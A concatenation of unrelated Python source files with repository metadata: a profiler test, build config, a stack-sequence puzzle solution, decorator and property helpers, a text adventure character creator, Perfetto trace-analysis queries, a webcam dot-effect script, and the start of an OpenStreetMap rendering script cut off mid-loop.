"nathan.dawson@723f4f67-661f-0410-8c27-63261dba3161"
] | nathan.dawson@723f4f67-661f-0410-8c27-63261dba3161 |
f7dd5ae13580c2a8137446a42f87b5b1b7ac7d71 | ea508c55e951f23ec2f4f5ff35b193d9f30a989a | /pyext/test2.py | a6ac16ef18987029e3ae36759a9eb62863bf2cb7 | [
"Apache-2.0"
] | permissive | intel-ai/pysamprof | f746551e30237fae9b8869e5e05156a3cb2aba13 | 643de4dd8260c9cd2f75ad5accf9b2e4cbd96c4d | refs/heads/master | 2023-01-25T02:21:01.665315 | 2020-11-27T08:18:22 | 2020-11-27T08:18:22 | 159,366,126 | 2 | 1 | Apache-2.0 | 2020-12-03T15:32:18 | 2018-11-27T16:30:40 | C | UTF-8 | Python | false | false | 787 | py | #!/usr/bin/env python
import pysamprof
import threading
import os
import errno
import sys
import subprocess
def foo():
counter = 0
while True:
target_path = '%s/results/%s' % (os.getcwd(), counter)
if os.path.exists(target_path):
counter += 1
else:
break
pysamprof.start(target_path)
def bar():
foo()
def task():
import time
import socket
stop = time.time() + 1
while time.time() <= stop:
pass
if __name__ == '__main__':
# proc = subprocess.Popen([sys.executable,
# os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'subtest.py')])
bar()
task()
os.fork()
task()
# th = threading.Thread(target=task)
# th.start()
# th.join()
# proc.wait()
| [
"vasilij.n.litvinov@intel.com"
] | vasilij.n.litvinov@intel.com |
36adf07500d5bc3797a8452a938b03936503f491 | e291353d76e7209ccee7eef14f32f4157f2daaf6 | /build/learning_tf/catkin_generated/pkg.installspace.context.pc.py | d848f2666aa4b56f426941c843f6d2fbf742b03c | [] | no_license | EmanuelAlogna/Robotics-Ass01 | 23bc7d2079212340b6c8a30fd0e84e8ca1de49cb | bfc6421e69d9719da945da8bf728416fb4fb636b | refs/heads/master | 2022-01-05T15:32:26.050866 | 2019-06-02T17:39:59 | 2019-06-02T17:39:59 | 187,210,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "learning_tf"
PROJECT_SPACE_DIR = "/home/emanuel/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
| [
"emanuel.alogna@gmail.com"
] | emanuel.alogna@gmail.com |
1852e9dffcb63b063f786faeffaec2ee72e25153 | 390d19c3159133d8c688396cb11b4ed3f8178d09 | /BaekJoon/단계별로 풀어보기/Stack & Queue/1874_스택 수열.py | a3b4cc9eb6adb72cb147d6257fb3a6768140f325 | [] | no_license | JJayeee/CodingPractice | adba64cbd1d030b13a877f0b2e5ccc1269cb2e11 | 60f8dce48c04850b9b265a9a31f49eb6d9fc13c8 | refs/heads/master | 2021-08-16T17:14:01.161390 | 2021-07-16T00:42:18 | 2021-07-16T00:42:18 | 226,757,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | n = int(input())
arr = [int(input()) for _ in range(n)]
cnt = 0
stack = []
path = []
for i in range(1, n+1):
stack.append(i)
path.append('+')
while stack and stack[-1] == arr[cnt]:
stack.pop()
path.append('-')
cnt += 1
if stack:
print('NO')
else:
for p in path:
print(p)
| [
"jay.hyundong@gmail.com"
] | jay.hyundong@gmail.com |
f113c125c3ce5cd72b7620e569795cbd92cdd0b5 | 44999f0e918047807c6505df2833c500a1fba22d | /util.py | 8bf9d2d0cf6cce58dc1849ddc5bdfb2c5146ca75 | [
"MIT"
] | permissive | PsiRadish/HeroesFeast | 3f3fcd2b0284cba3d58686688c283f52fb647df5 | 0c700e3e1e495671c70595bdb8927758f1fc6754 | refs/heads/master | 2021-07-18T16:10:46.375296 | 2017-12-23T01:13:59 | 2017-12-23T01:13:59 | 114,166,133 | 0 | 0 | MIT | 2021-06-10T19:51:32 | 2017-12-13T20:33:46 | Python | UTF-8 | Python | false | false | 316 | py |
class staticproperty: # https://stackoverflow.com/a/39499304
"""Works like @property and @staticmethod combined"""
def __init__(self, func):
self.func = func
def __get__(self, inst, owner):
result = self.func()
setattr(owner, self.func.__name__, result)
return result
| [
"KyleFiegener@gmail.com"
] | KyleFiegener@gmail.com |
435e29a274be72c7a13ebd6d95c17895552450da | 18c5519edd77fb222ec5c9ea338b651bd99aa147 | /objects/battle.py | b0d08f8a47d9f9a6011454552c8767751b52f701 | [
"BSD-3-Clause"
] | permissive | hdert/2018.py | 1b0a84d6ebc1bd6a4d56a95963851216931ea6a3 | 66fc5afc853af2ed5d6b2fc5f280e73be200a542 | refs/heads/master | 2020-05-09T16:42:55.913274 | 2020-01-25T06:56:31 | 2020-01-25T06:56:31 | 181,280,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,829 | py | '''
Author: hdert
Date: 13/6/2018
Version: V 0.1.3.6.6 Dev
'''
#--Classes--
class Character:
HUMAN = 'A Human'
ORC = 'An Orc'
ELF = 'An Elf'
BEAVER = 'A Beaver'
MALE = 'Male'
FEMALE = 'Female'
def __init__(self, pName, pRace, pGender, pSkill, pStrength, pHealth,
pWeapon):
self.name = pName
self.race = pRace
self.skill = pSkill
self.strength = pStrength
self.health = pHealth
self.weapon = pWeapon
self.gender = pGender
self.alive = 'Alive'
def __repr__(self):
return '''
{0} Is {1} And Is {2}
Weapon: {3}
Strength: {4}
Intelligence: {5}
Health: {6}
Status: {7}
'''.format(self.name, self.race, self.gender, self.weapon, self.strength,
self.skill,
self.health, self.alive)
def getName(self):
return self.name
def getRace(self):
return self.race
def getSkill(self):
return self.skill
def getStrength(self):
return self.strength
def getHealth(self):
return self.health
def getWeapon(self):
return self.weapon
def getGender(self):
return self.gender
def getAlive(self):
return self.alive
def setWeapon(self, weapon):
self.weapon = weapon
class Weapon:
FLAMETHROWER = 'A Flamethrower'
SHOTGUN = 'A Shotgun'
RIFLE = 'A Rifle'
def __init__(self, pname, ptype, ppower):
self.type = ptype
self.name = pname
self.power = ppower
def __repr__(self):
return '{}, {} With {} Power'.format(self.name, self.type,
self.power)
def getName(self):
return self.name
def getType(self):
return self.type
def getPower(self):
return self.power
#--Variables--
pick = False
lFlame = Weapon('BigFlame', Weapon.FLAMETHROWER, 30)
lShot = Weapon('ManyBullet', Weapon.SHOTGUN, 20)
lRifle = Weapon('NearlySniper', Weapon.RIFLE, 40)
mFlame = Weapon('NormFlame', Weapon.FLAMETHROWER, 20)
mShot = Weapon('NotSoManyBullet', Weapon.SHOTGUN, 15)
mRifle = Weapon('ArmyRifle', Weapon.RIFLE, 25)
sFlame = Weapon('ShortFlame', Weapon.FLAMETHROWER, 10)
sShot = Weapon('CoupleBullet', Weapon.SHOTGUN, 10)
sRifle = Weapon('ChineseGun', Weapon.RIFLE, 15)
#--Main-Code--
while pick == False:
firstName = input('Pick A First Name For Your Adventurer: ')
if firstName == '' or firstName == ' ':
print('''
Whoops "{}" Isn't A Valid Name
Let's Try That Again
Tip!: Try Making Your Name Something Other Than
"" Or " "
'''.format(firstName))
a = input("Press Enter To Continue ")
print('\n')
else:
pick = True
pick = False
while pick == False:
race = input('''
A Human (1)
An Orc (2)
An Elf (3)
Or A Beaver (4)
Pick A Race: ''')
if race == '1':
race = Character.HUMAN
skill = 65
strength = 55
health = 105
pick = True
elif race == '2':
race = Character.ORC
skill = 35
strength = 75
health = 125
pick = True
elif race == '3':
race = Character.ELF
skill = 85
strength = 35
health = 85
pick = True
elif race == '4':
race = Character.BEAVER
skill = 45
strength = 65
health = 75
pick = True
else:
print('''
Whoops What Went Wrong There
Let's Try That Again
Tip!: Try Using The Number Beside The Race Choice's
To Pick Your Character's Race
''')
a = input("Press Enter To Continue ")
pick = False
while pick == False:
gender = input('''
Male (1)
Or Female (2)
Pick A Gender: ''')
if gender == '1':
gender = Character.MALE
name = firstName + ' ' + firstName + 'son'
pick = True
elif gender == '2':
gender = Character.FEMALE
name = firstName + ' ' + firstName + 'daughter'
pick = True
else:
print('''
Whoops What Went Wrong There
Let's Try That Again
Tip!: Try Using The Number Beside The Gender Choice's
To Pick Your Character's Gender
''')
a = input("Press Enter To Continue ")
pick = False
while pick == False:
weapon = input('''
{} (1)
{} (2)
{} (3)
Pick A Starter Weapon: '''.format(sFlame, sShot, sRifle))
if weapon == '1':
weapon = sFlame
user = Character(name, race, gender, skill, strength,
health, weapon)
pick = True
elif weapon == '2':
weapon = sShot
user = Character(name, race, gender, skill, strength,
health, weapon)
pick = True
elif weapon == '3':
weapon = sRifle
user = Character(name, race, gender, skill, strength,
health, weapon)
pick = True
else:
print('''
Whoops What Went Wrong There
Let's Try That Again
Tip!: Try Using The Number Beside The Weapon Choice's
To Pick Your Character's Starting Weapon
''')
a = input("Press Enter To Continue ")
pick = False
while pick == False:
charPrint = input('''
Would You Like To See Your Newly
Created Character's Profile? (Y/N): ''')
if charPrint == 'Y' or charPrint == 'y':
pick = True
print(user)
elif charPrint == 'N' or charPrint == 'n':
pick = True
else:
print('''
Whoops What Went Wrong There
Let's Try That Again
Tip!: Try Using The Y or N To Pick Whether You
Want To See Your Character's Profile
''')
a = input("Press Enter To Continue ")
pick = False
| [
"40216616+Hdertgaming@users.noreply.github.com"
] | 40216616+Hdertgaming@users.noreply.github.com |
d1aa97ee9525de12321fffed6d30be61c50374f8 | add0702c25993c2c37eaf4b4e0c03f45808cbe45 | /tools/slice_breakdown/perfetto/slice_breakdown/breakdown.py | 85b21d2544ce4accdeae49df83c8c81b7cfeaeff | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | sszllx/perfetto | aa43900682628050e5768bfbe53078b37715eefb | e5fc9f62634b179a6ced07fd2f565a9cee70f5bd | refs/heads/master | 2023-08-19T18:11:18.671489 | 2021-10-29T03:44:33 | 2021-10-29T03:44:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,337 | py | #!/usr/bin/env python3
# Copyright (C) 2021 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def compute_breakdown(tp, start_ts=None, end_ts=None, process_name=None):
"""For each userspace slice in the trace processor instance |tp|, computes
the self-time of that slice grouping by process name, thread name
and thread state.
Args:
tp: the trace processor instance to query.
start_ts: optional bound to only consider slices after this ts
end_ts: optional bound to only consider slices until this ts
process_name: optional process name to filter for slices; specifying
this argument can make computing the breakdown a lot faster.
Returns:
A Pandas dataframe containing the total self time taken by a slice stack
broken down by process name, thread name and thread state.
"""
bounds = tp.query('SELECT * FROM trace_bounds').as_pandas_dataframe()
start_ts = start_ts if start_ts else bounds['start_ts'][0]
end_ts = end_ts if end_ts else bounds['end_ts'][0]
tp.query("""
DROP VIEW IF EXISTS modded_names
""")
tp.query("""
CREATE VIEW modded_names AS
SELECT
slice.id,
slice.depth,
slice.stack_id,
CASE
WHEN slice.name LIKE 'Choreographer#doFrame%'
THEN 'Choreographer#doFrame'
WHEN slice.name LIKE 'DrawFrames%'
THEN 'DrawFrames'
WHEN slice.name LIKE '/data/app%.apk'
THEN 'APK load'
WHEN slice.name LIKE 'OpenDexFilesFromOat%'
THEN 'OpenDexFilesFromOat'
WHEN slice.name LIKE 'Open oat file%'
THEN 'Open oat file'
ELSE slice.name
END AS modded_name
FROM slice
""")
tp.query("""
DROP VIEW IF EXISTS thread_slice_stack
""")
tp.query("""
CREATE VIEW thread_slice_stack AS
SELECT
efs.ts,
efs.dur,
IFNULL(n.stack_id, -1) AS stack_id,
t.utid,
IIF(efs.source_id IS NULL, '[No slice]', IFNULL(
(
SELECT GROUP_CONCAT(modded_name, ' > ')
FROM (
SELECT p.modded_name
FROM ancestor_slice(efs.source_id) a
JOIN modded_names p ON a.id = p.id
ORDER BY p.depth
)
) || ' > ' || n.modded_name,
n.modded_name
)) AS stack_name
FROM experimental_flat_slice({}, {}) efs
LEFT JOIN modded_names n ON efs.source_id = n.id
JOIN thread_track t ON t.id = efs.track_id
""".format(start_ts, end_ts))
tp.query("""
DROP TABLE IF EXISTS thread_slice_stack_with_state
""")
tp.query("""
CREATE VIRTUAL TABLE thread_slice_stack_with_state
USING SPAN_JOIN(
thread_slice_stack PARTITIONED utid,
thread_state PARTITIONED utid
)
""")
if process_name:
where_process = "AND process.name = '{}'".format(process_name)
else:
where_process = ''
breakdown = tp.query("""
SELECT
process.name AS process_name,
thread.name AS thread_name,
CASE
WHEN slice.state = 'D' and slice.io_wait
THEN 'Uninterruptible sleep (IO)'
WHEN slice.state = 'DK' and slice.io_wait
THEN 'Uninterruptible sleep + Wake-kill (IO)'
WHEN slice.state = 'D' and not slice.io_wait
THEN 'Uninterruptible sleep (non-IO)'
WHEN slice.state = 'DK' and not slice.io_wait
THEN 'Uninterruptible sleep + Wake-kill (non-IO)'
WHEN slice.state = 'D'
THEN 'Uninterruptible sleep'
WHEN slice.state = 'DK'
THEN 'Uninterruptible sleep + Wake-kill'
WHEN slice.state = 'S' THEN 'Interruptible sleep'
WHEN slice.state = 'R' THEN 'Runnable'
WHEN slice.state = 'R+' THEN 'Runnable (Preempted)'
ELSE slice.state
END AS state,
slice.stack_name,
SUM(slice.dur)/1e6 AS dur_sum,
MIN(slice.dur/1e6) AS dur_min,
MAX(slice.dur/1e6) AS dur_max,
AVG(slice.dur/1e6) AS dur_mean,
PERCENTILE(slice.dur/1e6, 50) AS dur_median,
PERCENTILE(slice.dur/1e6, 25) AS dur_25_percentile,
PERCENTILE(slice.dur/1e6, 75) AS dur_75_percentile,
PERCENTILE(slice.dur/1e6, 95) AS dur_95_percentile,
PERCENTILE(slice.dur/1e6, 99) AS dur_99_percentile,
COUNT(1) as count
FROM process
JOIN thread USING (upid)
JOIN thread_slice_stack_with_state slice USING (utid)
WHERE dur != -1 {}
GROUP BY thread.name, stack_id, state
ORDER BY dur_sum DESC
""".format(where_process)).as_pandas_dataframe()
return breakdown
def compute_breakdown_for_startup(tp, package_name=None, process_name=None):
"""Computes the slice breakdown (like |compute_breakdown|) but only
considering slices which happened during an app startup
Args:
tp: the trace processor instance to query.
package_name: optional package name to filter for startups. Only a single
startup matching this package name should be present. If not specified,
only a single startup of any app should be in the trace.
process_name: optional process name to filter for slices; specifying
this argument can make computing the breakdown a lot faster.
Returns:
The same as |compute_breakdown| but only containing slices which happened
during app startup.
"""
tp.metric(['android_startup'])
# Verify there was only one startup in the trace matching the package
# name.
filter = "WHERE package = '{}'".format(package_name) if package_name else ''
launches = tp.query('''
SELECT ts, ts_end, dur
FROM launches
{}
'''.format(filter)).as_pandas_dataframe()
if len(launches) == 0:
raise Exception("Didn't find startup in trace")
if len(launches) > 1:
raise Exception("Found multiple startups in trace")
start = launches['ts'][0]
end = launches['ts_end'][0]
return compute_breakdown(tp, start, end, process_name)
| [
"lalitm@google.com"
] | lalitm@google.com |
d111f7578b298ea148bce5bba4e6cc7466523c4e | 2cfd01446942d8113dbf8ec62b23f36a75333459 | /Decorator_examples/Passing_aruguments_to_decorators.py | 1edbc7fb2137aeed793e45daec8e702b9c08dd32 | [] | no_license | umesh-gattem-rzt/Python_Decorators | 9cb1e7b73d739d50ce648f48a8a2b03285700463 | 85e9dcb70cc1fb24a347bf5f38a41099071dc5bb | refs/heads/master | 2021-01-11T23:50:07.764872 | 2017-05-17T08:15:17 | 2017-05-17T08:15:17 | 78,634,262 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | from functools import wraps
def tags(tag_name):
def tags_decorator(func):
@wraps(func)
def func_wrapper(name):
return "<{0}>{1}</{0}>".format(tag_name, func(name))
return func_wrapper
return tags_decorator
@tags("div")
@tags("p")
@tags("strong")
def get_name(name):
"""Returns the Name of person"""
return "Hello " + name
print(get_name("Umesh Kumar"))
print(get_name.__name__)
print(get_name.__doc__)
print(get_name.__module__)
| [
"umesh@gattems-MacBook-Pro.local"
] | umesh@gattems-MacBook-Pro.local |
428376d583c567432c1ef5196b05262cfe856565 | d7b3feb650e3dd5f5e59c5e9ed796ef10767b32f | /dot_threshold_video_manupulation.py | 5227601562cb5fb4c1ebc3da8fec0ae05bc2e317 | [] | no_license | Mainak-Deb/opencv-video-manupulation-using-pygame | 6a83eed06623e006d3a531992bd111efe032e8a0 | 3c2f8727e11a6ed020e936b349a41325b9f4523b | refs/heads/master | 2023-02-21T03:42:21.747902 | 2021-01-19T21:34:11 | 2021-01-19T21:34:11 | 331,114,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,321 | py | import time,math,random
import pygame,sys
from pygame.locals import *
import math
import cv2
cap=cv2.VideoCapture(0)
ret,img1=cap.read()
k=((len(img1)*len(img1[1]))/5000)**(.5)
rx=len(img1)/k
ry=len(img1[1])/k
r=int(len(img1)/rx)
c=int(len(img1[1])/ry)
screenlenth=800
dis=screenlenth/100
screen=pygame.display.set_mode((int(dis*ry),int(dis*rx)))
pygame.display.set_caption("Video MANUPULATION 2")
pygame.init()
threshold=10
running=True
while running:
ret,img1=cap.read()
img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img1 = cv2.flip(img1, 1)
screen.fill((0,0,0))
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
cap.release()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
for i in range(int(c/2),len(img1),c):
for j in range(int(r/2),len(img1[i]),r):
cl=int((img1[i][j])/(255/threshold))*int(255/threshold)
pygame.draw.circle(screen,(cl,cl,cl),(int(dis*((j-int(c/2))/c)),int(dis*((i-int(r/2))/r))),int(dis/2))
pygame.display.update()
cap.release()
cv2.destroyAllWindows()
| [
"debmainak37@gmail.com"
] | debmainak37@gmail.com |
9c1e7ccfd0b2f7d17f8fe90ca5e9987b5d32120c | b9a68a2135a92419203f78fbf98f67340ed04095 | /rviz_map_publisher/scripts_without_ros/osm_render.py | 807eee0aae984ce23f55c219c299f7dc7666259f | [] | no_license | szenergy/szenergy-utility-programs | 487002758f2edfe877b88fa0853931f862a3a8e1 | 2a3d5e0213a4d68afe1ea22f5f38d399791e7ec8 | refs/heads/master | 2023-05-27T16:14:17.140427 | 2023-05-18T14:58:31 | 2023-05-18T14:58:31 | 207,478,962 | 2 | 3 | null | 2022-06-03T10:34:47 | 2019-09-10T06:12:33 | Jupyter Notebook | UTF-8 | Python | false | false | 27,086 | py |
#!/usr/bin/env python
#############################################################
## from http://code.activestate.com/recipes/534109-xml-to-python-data-structure/
import re
import xml.sax.handler
def xml2obj(src):
"""
A simple function to converts XML data into native Python object.
"""
non_id_char = re.compile('[^_0-9a-zA-Z]')
def _name_mangle(name):
return non_id_char.sub('_', name)
class DataNode(object):
def __init__(self):
self._attrs = {} # XML attributes and child elements
self.data = None # child text data
def __len__(self):
# treat single element as a list of 1
return 1
def __getitem__(self, key):
if isinstance(key, str): # basestring python 2 version
return self._attrs.get(key,None)
else:
return [self][key]
def __contains__(self, name):
return self._attrs.has_key(name)
def __nonzero__(self):
return bool(self._attrs or self.data)
def __getattr__(self, name):
if name.startswith('__'):
# need to do this for Python special methods???
raise AttributeError(name)
return self._attrs.get(name,None)
def _add_xml_attr(self, name, value):
if name in self._attrs:
# multiple attribute of the same name are represented by a list
children = self._attrs[name]
if not isinstance(children, list):
children = [children]
self._attrs[name] = children
children.append(value)
else:
self._attrs[name] = value
def __str__(self):
return self.data or ''
def __repr__(self):
items = sorted(self._attrs.items())
if self.data:
items.append(('data', self.data))
return u'{%s}' % ', '.join([u'%s:%s' % (k,repr(v)) for k,v in items])
class TreeBuilder(xml.sax.handler.ContentHandler):
def __init__(self):
self.stack = []
self.root = DataNode()
self.current = self.root
self.text_parts = []
def startElement(self, name, attrs):
self.stack.append((self.current, self.text_parts))
self.current = DataNode()
self.text_parts = []
# xml attributes --> python attributes
for k, v in attrs.items():
self.current._add_xml_attr(_name_mangle(k), v)
def endElement(self, name):
text = ''.join(self.text_parts).strip()
if text:
self.current.data = text
if self.current._attrs:
obj = self.current
else:
# a text only node is simply represented by the string
obj = text or ''
self.current, self.text_parts = self.stack.pop()
self.current._add_xml_attr(_name_mangle(name), obj)
def characters(self, content):
self.text_parts.append(content)
builder = TreeBuilder()
if isinstance(src,str): # basestring python 2 version
xml.sax.parseString(src, builder)
else:
xml.sax.parse(src, builder)
values_view = builder.root._attrs.values()
value_iterator = iter(values_view)
first_value = next(value_iterator)
# return builder.root._attrs.values()[0] # python 2 version
return first_value
#############################################################
def main():
# make dictionary of node IDs
nodes = {}
for node in myMap['node']:
nodes[node['id']] = node
ways = {}
for way in myMap['way']:
ways[way['id']]=way
print(len(nodes))
print(len(ways))
# draw the map
import pylab as p
##p.ion()
##
##p.figure()
##for way in myMap['way']:
## lastPoint=None
## for nd in way['nd']:
## newPointLat = nodes[nd['ref']]['lat']
## newPointLong= nodes[nd['ref']]['lon']
## newPoint = (float(newPointLat),float(newPointLong))
## if not lastPoint==None:
## lastX = lastPoint[0]
## lastY = lastPoint[1]
## newX = newPoint[0]
## newY = newPoint[1]
## p.plot([lastX,newX],[lastY,newY],'-b')
## lastPoint = newPoint
##
##p.ioff()
##p.show()
###p.ion()
##
##p.figure()
##for idx,nodeID in enumerate(nodes.keys()):
## y = float(nodes[nodeID]['lat'])
## x = float(nodes[nodeID]['lon'])
## p.plot([x],[y],'.b')
## if idx%1000 == 0:
## print(idx)
##
##p.ioff()
##p.show()
# try to find a list of all intersections
# build matrix of first and last node ids for each way
print('Enumerating end nodes.')
endNodes = {}
wayType = {}
for wayID in ways.keys():
endNodes[wayID] = [ ways[wayID]['nd'][0], ways[wayID]['nd'][-1]]
wayTags = ways[wayID]['tag']
if not wayTags==None:
hwyTypeList = [d['v'] for d in wayTags if d['k']=='highway']
if len(hwyTypeList)>0:
wayType[wayID] = hwyTypeList[0]
print('Done enumerating end nodes')
print(wayType)
print(set([wayType[k] for k in wayType.keys()]))
roadTypes = set([wayType[k] for k in wayType.keys()])
#p.ion()
renderingRules = {
'primary': dict(
marker = 'D',
markeredgecolor = 'b',
markeredgewidth = 1,
markerfacecolor = 'b',
markersize = 2,
linestyle = '-',
linewidth = 10,
color = (0.7,0.7,1.0,0.1),
alpha = 1.0,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -1,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'g',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'g',
_firstmarkersize = 8,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'r',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'r',
_lastmarkersize = 8,
_lastzorder = 0,
),
'primary_link': dict(
marker = 'D',
markeredgecolor = 'b',
markeredgewidth = 1,
markerfacecolor = 'b',
markersize = 2,
linestyle = '-',
linewidth = 8,
color = (0.7,0.7,1.0,0.1),
alpha = 1.0,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -1,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'g',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'g',
_firstmarkersize = 12,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'r',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'r',
_lastmarkersize = 8,
_lastzorder = 0,
),
'secondary': dict(
marker = 'D',
markeredgecolor = 'b',
markeredgewidth = 1,
markerfacecolor = 'b',
markersize = 2,
linestyle = '-',
linewidth = 6,
color = (0.2,0.2,0.7,0.1),
alpha = 0.5,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -2,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'g',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'g',
_firstmarkersize = 10,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'r',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'r',
_lastmarkersize = 8,
_lastzorder = 0,
),
'secondary_link': dict(
marker = 'D',
markeredgecolor = 'b',
markeredgewidth = 1,
markerfacecolor = 'b',
markersize = 2,
linestyle = '-',
linewidth = 6,
color = (0.2,0.2,0.7,0.1),
alpha = 0.5,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -2,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'g',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'g',
_firstmarkersize = 10,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'r',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'r',
_lastmarkersize = 8,
_lastzorder = 0,
),
'tertiary': dict(
marker = 'D',
markeredgecolor = 'b',
markeredgewidth = 1,
markerfacecolor = 'b',
markersize = 2,
linestyle = '-',
linewidth = 4,
color = (0.0,0.0,0.7,0.1),
alpha = 0.5,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -3,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'g',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'g',
_firstmarkersize = 10,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'r',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'r',
_lastmarkersize = 8,
_lastzorder = 0,
),
'tertiary_link': dict(
marker = 'D',
markeredgecolor = 'b',
markeredgewidth = 1,
markerfacecolor = 'b',
markersize = 2,
linestyle = '-',
linewidth = 4,
color = (0.0,0.0,0.7,0.1),
alpha = 0.5,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -3,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'g',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'g',
_firstmarkersize = 10,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'r',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'r',
_lastmarkersize = 8,
_lastzorder = 0,
),
'residential': dict(
marker = 'D',
markeredgecolor = 'b',
markeredgewidth = 1,
markerfacecolor = 'b',
markersize = 2,
linestyle = '-',
linewidth = 1,
color = (0.1,0.1,0.1,1.0),
alpha = 1.0,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -99,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'g',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'g',
_firstmarkersize = 10,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'r',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'r',
_lastmarkersize = 8,
_lastzorder = 0,
),
'unclassified': dict(
marker = 'D',
markeredgecolor = (0.5,0.5,0.5),
markeredgewidth = 1,
markerfacecolor = (0.5,0.5,0.5),
markersize = 2,
linestyle = ':',
linewidth = 1,
color = (0.5,0.5,0.5),
alpha = 0.5,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -1,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'g',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'g',
_firstmarkersize = 6,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'r',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'r',
_lastmarkersize = 6,
_lastzorder = 0,
),
'default': dict(
marker = 'D',
markeredgecolor = 'b',
markeredgewidth = 1,
markerfacecolor = 'b',
markersize = 2,
linestyle = '-',
linewidth = 3,
color = 'b',
alpha = 0.5,
solid_capstyle = 'round',
solid_joinstyle = 'round',
zorder = -1,
markerzorder = 0,
_firstmarker = 'x',
_firstmarkeredgecolor = 'b',
_firstmarkeredgewidth = 1,
_firstmarkerfacecolor = 'b',
_firstmarkersize = 6,
_firstzorder = 1,
_lastmarker = 'o',
_lastmarkeredgecolor = 'b',
_lastmarkeredgewidth = 1,
_lastmarkerfacecolor = 'b',
_lastmarkersize = 6,
_lastzorder = 0,
),
}
for idx,nodeID in enumerate(nodes.keys()):
if idx==0:
minX = float(nodes[nodeID]['lon'])
maxX = float(nodes[nodeID]['lon'])
minY = float(nodes[nodeID]['lat'])
maxY = float(nodes[nodeID]['lat'])
else:
minX = min(minX,float(nodes[nodeID]['lon']))
maxX = max(maxX,float(nodes[nodeID]['lon']))
minY = min(minY,float(nodes[nodeID]['lat']))
maxY = max(maxY,float(nodes[nodeID]['lat']))
minX = float(myMap['bounds']['minlon'])
maxX = float(myMap['bounds']['maxlon'])
minY = float(myMap['bounds']['minlat'])
maxY = float(myMap['bounds']['maxlat'])
fig = p.figure()
ax = fig.add_subplot(111,autoscale_on=False,xlim=(minX,maxX),ylim=(minY,maxY))
for idx,nodeID in enumerate(wayType.keys()):
## if idx>100:
## break
try:
if wayType[nodeID] in ['primary','primary_link','unclassified',
'secondary','secondary_link',
'tertiary','tertiary_link',
'residential',
]:
zz=['primary_link','primary',
'secondary','secondary_link',
'tertiary','tertiary_link',
'motorway','motorway_link',
'service',
'residential'
'unclassified',
]
oldX = None
oldY = None
thisRoadType = wayType[nodeID]
if thisRoadType in renderingRules.keys():
thisRendering = renderingRules[thisRoadType]
else:
thisRendering = renderingRules['default']
for nCnt,nID in enumerate(ways[nodeID]['nd']):
y = float(nodes[nID['ref']]['lat'])
